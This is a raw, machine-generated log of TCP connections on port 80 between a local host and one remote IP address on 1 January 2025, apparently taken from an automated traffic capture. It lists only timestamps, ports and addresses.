                                                                                                                                                                                            Jan 1, 2025 14:52:47.449286938 CET8049802104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:47.495719910 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.716538906 CET8049802104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:47.761466980 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.838040113 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.838522911 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843185902 CET8049802104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843274117 CET4980280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843374968 CET8049803104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843441963 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.843517065 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:47.848422050 CET8049803104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.198997021 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.203941107 CET8049803104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.293790102 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.294271946 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.298860073 CET8049803104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.298924923 CET4980380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.299105883 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.299171925 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.299252987 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.304147005 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.411508083 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.416402102 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.416496038 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.416573048 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.421389103 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.652108908 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.657094955 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.657131910 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.746593952 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.761404037 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.766316891 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.792606115 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:48.859692097 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:48.902163982 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.014851093 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.029669046 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.058235884 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.073885918 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.145406008 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.145428896 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.146100998 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.150783062 CET8049804104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.150866985 CET4980480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.150945902 CET8049806104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.151015043 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.151092052 CET8049805104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.151153088 CET4980580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.151197910 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.156016111 CET8049806104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.495932102 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.500849009 CET8049806104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.597302914 CET8049806104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.651972055 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.866640091 CET8049806104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.917612076 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.989409924 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.994368076 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:49.994437933 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.994513035 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:49.999387980 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:50.339601040 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:50.344480038 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:50.472712040 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:50.516894102 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.034471035 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.089493036 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.144542933 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.145173073 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.149610043 CET8049808104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.149678946 CET4980880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.150074005 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.150140047 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.150233984 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.155038118 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.495820999 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.500757933 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.592094898 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.636354923 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.864300013 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.917717934 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.988802910 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.989557981 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.993907928 CET8049809104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.993989944 CET4980980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.994534016 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:51.994602919 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.994693041 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:51.999473095 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.339708090 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.344804049 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.440845013 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.495752096 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.702603102 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.745745897 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.816581964 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.817229986 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822079897 CET8049810104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822125912 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822263002 CET4981080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822299004 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822398901 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:52.827236891 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.167794943 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.172818899 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.266319036 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.308259964 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.529279947 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.573880911 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.648850918 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.649174929 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.653976917 CET8049811104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.654021978 CET8049813104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:53.654047966 CET4981180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.654098988 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.654299021 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:53.659110069 CET8049813104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.011516094 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.016475916 CET8049813104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.027724028 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.028290987 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033083916 CET8049813104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033138990 CET4981380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033142090 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033204079 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033298016 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.038104057 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.145483017 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.150407076 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.150506020 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.150602102 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.155458927 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.386501074 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.391392946 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.391525984 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.495874882 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.500840902 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.505791903 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.558268070 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.595266104 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.636414051 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.664134026 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.714550972 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:54.850723028 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:54.902020931 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.058741093 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.058816910 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.059484005 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.063719034 CET8049814104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.063775063 CET4981480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064172029 CET8049815104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064233065 CET4981580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064259052 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064311028 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064404964 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.069139004 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.417722940 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.422692060 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.535515070 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.589531898 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.705616951 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.745801926 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.817410946 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.818103075 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.822380066 CET8049821104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.822443962 CET4982180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.822969913 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:55.823026896 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.823117971 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:55.827858925 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.167776108 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.172666073 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.267302990 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.308283091 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.529376030 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.573909998 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.649223089 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.650063038 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655000925 CET8049827104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655055046 CET4982780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655448914 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655507088 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655623913 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:56.660351992 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.011529922 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.016355991 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.120121002 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.167656898 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.376836061 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.417659998 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.488213062 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.488799095 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493176937 CET8049833104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493231058 CET4983380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493639946 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493695974 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493779898 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.498598099 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.839742899 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:57.844701052 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.947257042 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:57.995800018 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.117566109 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.167709112 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.240931988 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.241615057 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.245899916 CET8049839104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.246117115 CET4983980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.246553898 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.246634007 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.246815920 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.251610994 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.605243921 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.610202074 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.694487095 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.745800972 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:58.954049110 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:58.995794058 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.101969004 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.107047081 CET8049845104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.108761072 CET4984580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.111481905 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.116302013 CET8049855104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.116374016 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.117568016 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.122323036 CET8049855104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.502351046 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.507389069 CET8049855104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.590369940 CET8049855104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.636437893 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.670171976 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.670376062 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675205946 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675220966 CET8049855104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675287008 CET4985580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675299883 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675390005 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.680111885 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.789305925 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.794181108 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:59.794265032 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.795131922 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:59.799941063 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.027266979 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.032274008 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.032378912 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.119092941 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.152175903 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.157032013 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.167687893 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.242429018 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.283760071 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.292762995 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.323951006 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.417859077 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.464557886 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.539190054 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.540122986 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.540122986 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.544296980 CET8049857104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.544451952 CET4985780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545022011 CET8049864104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545113087 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545177937 CET8049858104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545233011 CET4985880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545312881 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.550090075 CET8049864104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:00.902198076 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:00.907279968 CET8049864104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.042879105 CET8049864104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.089612961 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.250606060 CET8049864104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.292921066 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.367923975 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.372932911 CET8049871104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.373011112 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.373091936 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.377940893 CET8049871104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.730480909 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:01.735694885 CET8049871104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.869383097 CET8049871104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:01.917717934 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.200321913 CET8049871104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:02.245815992 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.503820896 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.504699945 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.508959055 CET8049871104.21.38.84192.168.2.4
